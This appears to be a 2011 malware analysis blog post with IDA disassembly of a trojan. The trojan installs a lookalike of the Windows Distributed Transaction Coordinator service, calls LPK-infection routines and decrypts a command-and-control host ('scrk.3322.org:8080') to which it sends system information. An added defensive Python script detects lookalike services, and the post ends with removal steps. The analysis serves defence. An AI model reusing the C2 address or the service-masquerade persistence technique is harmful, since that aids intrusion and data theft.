.text:00402A87 mov [ebp+var_4], 0
.text:00402A8E ; 25: StartServiceCtrlDispatcherA(&ServiceStartTable);
.text:00402A8E call StartServiceCtrlDispatcherA ; if the service already exists, start it directly
.text:00402A94 ; 39: return 1;
.text:00402A94
.text:00402A94 loc_402A94: ; CODE XREF: OnInit+DBj
.text:00402A94 mov eax, 1
.text:00402A99 mov esp, ebp
.text:00402A9B pop ebp
.text:00402A9C retn
.text:00402A9D ; ---------------------------------------------------------------------------
.text:00402A9D ; 29: sub_402B40(
.text:00402A9D ; 30: "Distribuvbf",
.text:00402A9D ; 31: "Distribuihd Transaction Coordinator Service",
.text:00402A9D ; 32: "Distribucha Transaction Coordinator Service.");
.text:00402A9D
.text:00402A9D loc_402A9D: ; CODE XREF: OnInit+8Cj
.text:00402A9D push offset Data ; "Distribucha Transaction Coordinator Ser"...
.text:00402AA2 push offset DisplayName ; "Distribuihd Transaction Coordinator Ser"...
.text:00402AA7 push offset ServiceName ; "Distribuvbf"
.text:00402AAC call RegServiceAndStart
.text:00402AB1 ; 33: if ( dword_409388 )
.text:00402AB1 mov eax, dword_409388 ; if that failed, just exit...
.text:00402AB6 add esp, 0Ch
.text:00402AB9 test eax, eax
.text:00402ABB jz short loc_402A94
.text:00402ABD ; 35: sub_402330();
.text:00402ABD call MoveFile ; 0012F65C 0012F784 |NewName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
.text:00402AC2 ; 36: ExitProcess(0);
.text:00402AC2 push 0 ; uExitCode
.text:00402AC4 call ds:ExitProcess
.text:00402AC4 OnInit endp
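OnInit ties the dropped exe to a service named Distribuvbf whose display name, "Distribuihd Transaction Coordinator Service", is a deliberate lookalike of the Windows Distributed Transaction Coordinator (service name MSDTC): if the registry key already exists the service is started through StartServiceCtrlDispatcherA, otherwise RegServiceAndStart registers it first. The Python below is an added example of a defender-side check for that pattern and is not part of the original post. It compares each service's display name against a list of legitimate display names with difflib and flags entries that look like a known service but carry a different service name. SAMPLE_SERVICES is constructed data shaped like (ServiceName, DisplayName, ImagePath); its first entry reuses the names from the listing with a placeholder image path, and load_services_from_registry() reads the real list from HKLM\SYSTEM\CurrentControlSet\Services when run on Windows.

```python
import difflib

# Display names of legitimate Windows services that malware imitates. Only the one this
# sample copies is listed; extend the mapping for other lookalike families.
KNOWN_SERVICES = {"MSDTC": "Distributed Transaction Coordinator"}

# Constructed sample shaped like (ServiceName, DisplayName, ImagePath). The first entry
# uses the names seen in the OnInit listing; the image path is a placeholder.
SAMPLE_SERVICES = [
    ("Distribuvbf", "Distribuihd Transaction Coordinator Service", r"C:\WINDOWS\system32\<dropped-exe>.exe"),
    ("MSDTC", "Distributed Transaction Coordinator", r"C:\WINDOWS\system32\msdtc.exe"),
    ("Spooler", "Print Spooler", r"C:\WINDOWS\system32\spoolsv.exe"),
]


def normalize(display_name):
    """Lower-case, collapse whitespace and drop a trailing ' service' so the padding word does not dilute the score."""
    name = " ".join(display_name.lower().split())
    if name.endswith(" service"):
        name = name[: -len(" service")]
    return name


def similarity(a, b):
    """Ratio in [0, 1] between two normalized display names."""
    return difflib.SequenceMatcher(None, normalize(a), normalize(b)).ratio()


def lookalike_services(services, threshold=0.8):
    """Return services whose display name imitates a known one under a different service name."""
    findings = []
    for service_name, display_name, image_path in services:
        for known_name, known_display in KNOWN_SERVICES.items():
            if service_name.lower() == known_name.lower():
                continue  # the genuine service
            score = similarity(display_name, known_display)
            if score >= threshold:
                findings.append({
                    "service": service_name,
                    "display": display_name,
                    "image": image_path,
                    "mimics": known_name,
                    "score": round(score, 3),
                })
    return findings


def load_services_from_registry():
    """Read (ServiceName, DisplayName, ImagePath) from the live registry (Windows only)."""
    import winreg  # raises ImportError on other platforms
    services = []
    base = r"SYSTEM\CurrentControlSet\Services"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as root:
        count = winreg.QueryInfoKey(root)[0]
        for i in range(count):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name) as key:
                    display = winreg.QueryValueEx(key, "DisplayName")[0]
                    image = winreg.QueryValueEx(key, "ImagePath")[0]
            except OSError:
                continue  # key without DisplayName/ImagePath (drivers, legacy entries)
            services.append((name, str(display), str(image)))
    return services


if __name__ == "__main__":
    try:
        inventory = load_services_from_registry()
    except ImportError:
        inventory = SAMPLE_SERVICES
    for hit in lookalike_services(inventory):
        print(f"{hit['service']!r} ({hit['display']!r}) mimics {hit['mimics']} "
              f"score={hit['score']} image={hit['image']}")
```

On current Windows releases many DisplayName values are MUI resource references of the form "@path.dll,-id" rather than literal text; those need resolving before comparison, and this example leaves them as they are. A hit is a starting point: confirm it by checking the image path (the post's advice to look for the newest exe in System32 applies) before stopping and deleting the service.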
The dirty decryption
.text:004027E6 ; 20: lpkInfect();
.text:004027E6
.text:004027E6 loc_4027E6: ; CODE XREF: sub_402730+A9j
.text:004027E6 call lpkInfect
.text:004027EB ; 21: wsprintfA(&v0, "hra%u.dll", 33);
.text:004027EB push 21h
.text:004027ED lea ecx, [esp+14h]
.text:004027F1 push offset aHraU_dll ; "hra%u.dll"
.text:004027F6 push ecx ; LPSTR
.text:004027F7 call wsprintfA
.text:004027FD ; 22: sub_402520(&v0);
.text:004027FD lea edx, [esp+1Ch]
.text:00402801 push edx ; pFileName
.text:00402802 call sub_402520
.text:00402807 ; 23: LoadVirusLpk();
.text:00402807 call LoadVirusLpk
.text:0040280C ; 24: decode((int)"s僼婸3344P弔?>6>6", strlen("s僼婸3344P弔?>6>6") - 1, 18);
.text:0040280C mov edi, offset aSgtlp3344pptz66 ; ASCII "scrk.3322.org:8080"
.text:0040280C ; the string after decryption
.text:00402811 or ecx, 0FFFFFFFFh
.text:00402814 xor eax, eax
.text:00402816 push 12h
.text:00402818 repne scasb
.text:0040281A not ecx
.text:0040281C dec ecx
.text:0040281D push ecx
.text:0040281E push offset aSgtlp3344pptz66 ; "s僼婸3344P弔?>6>6"
.text:00402823 call decode
.text:00402828 ; 25: WSAStartup(0x202u, (struct WSAData *)((char *)&WSAData + 16));
.text:00402828 add esp, 1Ch
.text:0040282B lea eax, [esp+294h+WSAData.szDescription+0Ch]
.text:00402832 push eax ; lpWSAData
.text:00402833 push 202h ; wVersionRequested
.text:00402838 call WSAStartup
.text:0040283E mov edi, ds:WaitForSingleObject
.text:00402844 mov ebx, ds:CloseHandle
.text:0040284A mov ebp, closesocket
.text:00402850 ; 28: hObject = CreateThraed((LPTHREAD_START_ROUTINE)bAdApple, 0); my grudge against that rotten apple is world-class...
.text:00402850
.text:00402850 loc_402850: ; CODE XREF: sub_402730+159j
.text:00402850 push 0 ; lpParameter
.text:00402852 push offset bAdApple ; lpStartAddress
.text:00402857 call CreateThraed
.text:0040285C ; 29: WaitForSingleObject(hObject, 0xFFFFFFFFu);
.text:0040285C push 0FFFFFFFFh ; dwMilliseconds
.text:0040285E ; 26: while ( 1 )
.text:0040285E push eax ; hHandle
.text:0040285F mov hObject, eax
.text:00402864 call edi ; WaitForSingleObject
.text:00402866 ; 30: CloseHandle(hObject);
.text:00402866 mov ecx, hObject
.text:0040286C push ecx ; hObject
.text:0040286D call ebx ; CloseHandle
.text:0040286F ; 31: closesocket(s);
.text:0040286F mov edx, s
.text:00402875 push edx ; s
.text:00402876 call ebp ; closesocket
.text:00402878 ; 33: Sleep(0x12Cu);
.text:00402878 push 12Ch ; dwMilliseconds
.text:0040287D ; 32: dword_408634 = 1;
.text:0040287D mov dword_408634, 1
.text:00402887 call esi ; Sleep
.text:00402889 jmp short loc_402850
Then CreateThread does the dirty work
The dirty-work callback function
004019C0 . 81EC C4090000 sub esp, 9C4
This part is rather long and I'm not much good at analysing it; anyone interested can look at the idb I uploaded.
Then a series of calls gathers basic information about the computer and sends it to the address decrypted above... and loads the dirty Lpk to carry out the infection...
That completes the analysis of the virus's whole infection module... Since I'm a networking idiot, even when I see the network code I can't tell what it is actually doing... (facepalm)...
This virus just starts a service and does all its dirty work inside it. Since I've never done service development either, I don't know how to analyse that part, but the scattered analysis above has probably already covered everything the service does...
To remove the virus, first stop the virus's service, then delete the service with XueTr, then go to System32 and find the most recently modified exe; that is probably the one. I recommend removing it with a tool, because this thing infects even compressed archives and manual cleanup is awkward; of course you could also write a tool...
- - I hate people who use their skills to do bad things. Shame on the virus author; how boring... This game of cat and mouse will probably never end...
To be honest, the reason I analysed this virus today is that at noon I broke a classmate's computer while trying to fix it... just venting... what a bug... compressed someone's Bootmgr yet again... - - I've just finished sorting it out, so there's no need to keep moping; off to have some fun. Good night, everyone.
One game CG thrown in as a bonus
Azure[LCG]
2011.02.06